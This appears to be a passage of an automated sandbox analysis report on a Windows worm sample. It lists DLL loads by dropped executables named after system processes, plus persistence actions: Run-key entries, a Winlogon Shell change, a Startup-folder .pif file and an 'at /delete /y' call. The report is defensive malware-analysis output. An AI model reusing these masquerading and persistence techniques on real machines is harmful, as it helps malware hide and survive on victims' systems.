                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: appresolver.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sppc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: starttiledata.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswb7.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: icu.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.search.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\smss.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\winlogon.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: schedcli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\SysWOW64\at.exeSection loaded: cryptdll.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\services.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsnt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: activeds.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: adsldpc.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: browcli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cscapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\lsass.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\inetinfo.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeFile written: C:\Users\user\AppData\Local\BronMesPedang @ P#U00ecsau.ini
                  Source: initial sampleStatic PE information: section where entry point is pointing to: u
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: section name: BLDF
                  Source: Pedang @ P#U00ecsau.exeStatic PE information: section name: u

                  Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\smss.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Windows\SysWOW64\sistem.sys
Source: C:\Users\user\AppData\Local\smss.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif

                  Boot Survival

Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Windows\SysWOW64\at.exe at /delete /y
Source: C:\Users\user\AppData\Local\smss.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus-cfhnmoox
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus-cfhnmoox
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus-2091
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\smss.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\smss.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\smss.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\smss.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\services.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\services.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\services.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\services.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\lsass.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\lsass.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\lsass.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\lsass.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
Source: C:\Users\user\AppData\Local\winlogon.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Tok-Cirrhatus
                  Source: C:\Users\user\AppData\Local\winlogon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Bron-Spizaetus
